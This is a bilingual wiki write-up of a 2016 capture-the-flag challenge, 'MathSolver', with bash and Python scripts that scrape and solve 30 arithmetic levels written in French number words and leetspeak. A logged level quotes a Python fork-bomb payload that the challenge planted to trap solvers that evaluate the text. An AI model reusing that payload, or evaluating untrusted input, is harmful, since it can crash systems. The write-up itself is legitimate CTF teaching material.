Outils pour utilisateurs

Outils du site


ctf:public:sthack2016:mathsolver

MathSolver - Writeup by Pibou & Kordump

Challenge

http://mathsolver.sthack.fr/
Résolvez les 30 niveaux en moins de 10 secondes pour obtenir le flag de validation!
Solve the 30 levels in less than 10 seconds to get the flag!

Bash Solution (Kordump)

I have to solve 30 levels of common calculations issued by an HTML page. Let's do this.

The following command solves the first level, using bc (« bash calculator ») :

math.sh
curl -c cookie_jar -b cookie_jar -d "res=$(curl -c cookie_jar -b cookie_jar http://mathsolver.sthack.fr/|grep calc|tee -a /tmp/log|sed "s/^.*calc'>\([^<]*\)<.*$/\1/g"|bc)" http://mathsolver.sthack.fr/play.php|tee next_level|grep "level .."

Here are a sample of /tmp/log for the 12th first level :

/tmp/log
Can you solve the level 1?<br/><h3><div id='calc'>0 * 7</div></h3><br/>
Can you solve the level 2?<br/><h3><div id='calc'>8 + 7</div></h3><br/>                
Can you solve the level 3?<br/><h3><div id='calc'>7 - 3</div></h3><br/>                
<!-- ... -->
Can you solve the level 11?<br/><h3><div id='calc'>5907 - 6002</div></h3><br/>                
Can you solve the level 12?<br/><h3><div id='calc'>[__import__('os').fork() for x in range (0,100000) ]</div><div id='sry'>4698 * 7940</div></h3><br/>

The following levels are a bit harder, as they use plain-text numbers :

/tmp/log
Can you solve the level 13?<br/><h3><div id='calc'>soixante quatorze + seize</div></h3><br/>

French numbers are a bit complex, so let's make ourselves a dictionnary :

dictionnary.sh
for i in $(seq 1 10000)
do echo $(curl http://chiffre-en-lettre.fr/ecrire-nombre-$i|grep -A 1 "1990 :</i><br>"|grep "h6"|sed "s:.*bsp;\([^;]\+[^<]\+\)</h6.*:\1:") $i >> dico
done
# Few cosmetics has been applied to our raw dictionnary in order to fit the challenge :
# The final refined dictionnary is in « dico_final ».

A couple of functions later, we parse the following 18 levels, including l33tsp34k :

math.sh
function conv_plaintext_to_number
{
    echo "$1" >> /tmp/conv_log
    cat dico_final|awk '$1=$1'|grep "$1"|head -n 1|rev|cut -d " " -f 1|rev
}
 
function normalize_level
{
    cat "$1" | grep calc | sed "s/^.*calc'>\([^<]*\)<.*$/\1/g"\
    | sed "s/1/i/g;s/3/e/g;s/4/a/g;s/0/o/g;s/5/s/g;s/  / /g" > current_level
 
    echo -n "$(conv_plaintext_to_number "$(cat current_level | sed "s/^\(.\+\) [^a-z] .*/\1/g")")"
    echo -n "$(cat current_level | sed "s/^.\+ \([^a-z]\) .*/  \1  /g")"
    echo "$(conv_plaintext_to_number "$(cat current_level | sed "s/^.\+ [^a-z] \(.*\)/\1/g")")"
}
 
# Solves the 13th & 14th level
curl -c cookie_jar -b cookie_jar -d "res=$(normalize_level next_level_B|tee -a /tmp/bc_log|bc)" http://mathsolver.sthack.fr/play.php|tee next_level_A|tee -a output_final|grep 'level ...'
curl -c cookie_jar -b cookie_jar -d "res=$(normalize_level next_level_A|tee -a /tmp/bc_log|bc)" http://mathsolver.sthack.fr/play.php|tee next_level_B|tee -a output_final|grep 'level ...'
 
# ...

Here below are a proper solution in Python. ; )

Python Solution (Pibou)

English


The challenge consists of an HTML page which contains a calculation. The goal is to solve the 30 levels by sending the result to the form.

I used a Session object of requests to keep the session open.

The level difficulty is increasing: the first calculations are written in numbers, then in letters, and finally in l33t5p34k. Possible operations are +, -, * and %.

To solve this challenge, I wrote a script mostly based on regular expressions.

There are multiple specific cases to cover, especially numbers like 80 or 90, which in their written form in French are the only numbers of one word that are a multiplication instead of an addition.

Another difficulty was introduced: in one level, the HTML page has a different structure. It contains a <div id='sry'> block instead of the regular <div id='calc'> block. This detail must taken in account when writing the script.

With a dictionary holding all elementary (that are not a composition) numbers written in letters as keys and the corresponding number as value, we can parse the expression and recreate the number. By grouping all units in one list, we can simply call sum on that list to get the numbers, and make the calculation.

solver.py
#!/usr/bin/python
 
import re
import requests
 
nombres = {
        "zero": 0,
        "un": 1,
        "deux": 2,
        "trois": 3,
        "quatre": 4,
        "cinq": 5,
        "six": 6,
        "sept": 7,
        "huit": 8,
        "neuf": 9,
        "dix": 10,
        "onze": 11,
        "douze": 12,
        "treize": 13,
        "quatorze": 14,
        "quinze": 15,
        "seize": 16,
        "vingt": 20,
        "trente": 30,
        "quarante": 40,
        "cinquante": 50,
        "soixante": 60,
        "cent": 100,
        "cents": 100,
        "mille": 1000,
}
 
def open_session():
    req = requests.Session()
    req.headers.update({'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'})
 
    return req
 
def calcul(req, data):
    if "<div id=\'sry\'>" in data.text:
        regex = re.search('<div id=\'sry\'>(?P<calcul>.*)<\/div>', data.text)
    else:
        regex = re.search('<div id=\'calc\'>(?P<calcul>.*)<\/div>', data.text)
    print(regex.group('calcul'))
    calcul = regex.group('calcul').rstrip()
 
    parties = calcul.split(' ')
    print(parties)
 
    mots_op1 = []
    mots_op2 = []
    est_op1 = True
    i = 0
    for p in parties:
        # l33t5p34k
        if bool(re.search('[a-z]', p, re.IGNORECASE)) and bool(re.search('[0-9]', p)) and len(p) > 1:
            p = p.replace('0', 'o')
            p = p.replace('5', 's')
            p = p.replace('3', 'e')
            p = p.replace('1', 'i')
            p = p.replace('4', 'a')
 
        # Nombre en toutes lettres
        if bool(re.search('[a-z-]', p, re.IGNORECASE)) and len(p) > 1:
            if '-' in p:
                if p == 'quatre-vingt':
                    if est_op1:
                        mots_op1.append(80)
                    else:
                        mots_op2.append(80)
                elif p == 'quatre-vingt-dix':
                    if est_op1:
                        mots_op1.append(90)
                    else:
                        mots_op2.append(90)
                else:
                    decoupe = p.split('-')
                    nb = 0
                    for e in decoupe:
                        nb = nb + nombres[e]
                        print(nombres[e])
                    if est_op1:
                        mots_op1.append(nb)
                    else:
                        mots_op2.append(nb)
            else:
                if est_op1:
                    mots_op1.append(nombres[p])
                else:
                    mots_op2.append(nombres[p])
        # Chiffre
        elif bool(re.search('[0-9]', p)):
            if est_op1:
                mots_op1.append(int(p))
            else:
                mots_op2.append(int(p))
        # Opération
        else:
            operation = p
            est_op1 = False
        i = i + 1
 
    # Grands nombres (>= 100)
    i = 0
    for m1 in mots_op1:
        if (i + 1) < len(mots_op1):
            if m1 < mots_op1[i + 1] and (i + 1) < len(mots_op1) and mots_op1[i + 1] >= 100:
                mots_op1[i] = m1 * mots_op1[i + 1]
                del(mots_op1[i + 1])
            i = i + 1
 
    i = 0
    for m2 in mots_op2:
        if (i + 1) < len(mots_op2):
            if m2 < mots_op2[i + 1] and (i + 1) < len(mots_op2) and mots_op2[i + 1] >= 100:
                mots_op2[i] = m2 * mots_op2[i + 1]
                del(mots_op2[i + 1])
            i = i + 1
 
 
    print(mots_op1)
    print(mots_op2)
 
    if len(mots_op1) <= 1 and len(mots_op2) <= 1:
        try:
            op1 = int(mots_op1[0])
            op2 = int(mots_op2[0])
        except ValueError:
            op1 = nombres[mots_op1[0]]
            op2 = nombres[mots_op2[0]]
    else:
        op1 = sum(mots_op1)
        op2 = sum(mots_op2)
 
    print(op1)
    print(op2)
 
    if operation == '+':
        return op1 + op2
    elif operation == '-':
        return op1 - op2
    elif operation == '*':
        return op1 * op2
    elif operation == '%':
        return op1 % op2
 
if __name__=='__main__':
    r = open_session()
    d = r.get('http://mathsolver.sthack.fr/play.php')
    res = calcul(r, d)
    print(res)
    res_data = r.post(url="http://mathsolver.sthack.fr/play.php", data={'res': res})
    print(res_data.text)
    while True:
        res = calcul(r, res_data)
        print(res)
        res_data = r.post(url="http://mathsolver.sthack.fr/play.php", data={'res': res})
        print(res_data.text)

Here is the execution trace for the last level:

<html>

<head>

        <meta charset="utf-8">
        <title>MathSolver</title>

</head>
<body>

        <div id="content" style="text-align: center;">
                Can you solve the level 30?<br/><h3><div id='calc'>d3ux m1ll3 hu1t c3nt un * qu4tr3 m1ll3 n3uf c3nt d0uz3</div></h3><br/>                <form action="#" method="post">
                        <input type="text" name="res" /></p>
                        <p><input type="submit" value="OK"></p>
                </form>
        </div>
</body>

d3ux m1ll3 hu1t c3nt un * qu4tr3 m1ll3 n3uf c3nt d0uz3
['d3ux', 'm1ll3', 'hu1t', 'c3nt', 'un', '*', 'qu4tr3', 'm1ll3', 'n3uf', 'c3nt', 'd0uz3']
[2000, 800, 1]
[4000, 900, 12]
2801
4912
13758512

Français


Le challenge consiste en une page HTML qui contient un calcul, et un formulaire. Il faut résoudre le calcul et envoyer le résultat au formulaire, et ce pour les 30 niveaux.

J'ai utilisé un objet Session de requests pour conserver la session.

La difficulté des niveaux est croissante : les premiers calculs sont écrits en nombres, puis en lettres, et enfin en l33t5p34k. Les opérations possibles sont +, -, * et %.

Pour résoudre ce challenge, je me suis principalement basé sur des expressions régulières.

Il faut traiter plusieurs cas particuliers, notamment des nombres comme quatre-vingt, quatre-vingt-dix, les deux seuls nombres en un mot à être un produit au lieu d'une addition (comme dix-huit par exemple).

Une difficulté supplémentaire a été ajoutée : au niveau 12, la page HTML retournée a une structure différente : elle contient un bloc <div id='sry'> au lieu de l'habituel <div id='calc'>. Il faut donc prendre ça en compte dans le script.

À partir d'un dictionnaire contenant les nombres en toute lettres comme clé et le nombre en valeur, on peut parser l'expression et reconstituer le nombre correspondant. En regroupant les unités dans une liste, il suffit d'appeler sum sur cette liste pour obtenir le nombre, et enfin d'effectuer le calcul.

solver.py
 

Voici la trace d'exécution pour le niveau 30 :

<html>

<head>

        <meta charset="utf-8">
        <title>MathSolver</title>

</head>
<body>

        <div id="content" style="text-align: center;">
                Can you solve the level 30?<br/><h3><div id='calc'>d3ux m1ll3 hu1t c3nt un * qu4tr3 m1ll3 n3uf c3nt d0uz3</div></h3><br/>                <form action="#" method="post">
                        <input type="text" name="res" /></p>
                        <p><input type="submit" value="OK"></p>
                </form>
        </div>
</body>

d3ux m1ll3 hu1t c3nt un * qu4tr3 m1ll3 n3uf c3nt d0uz3
['d3ux', 'm1ll3', 'hu1t', 'c3nt', 'un', '*', 'qu4tr3', 'm1ll3', 'n3uf', 'c3nt', 'd0uz3']
[2000, 800, 1]
[4000, 900, 12]
2801
4912
13758512
ctf/public/sthack2016/mathsolver.txt · Dernière modification: 2016/10/06 07:12 par arthaum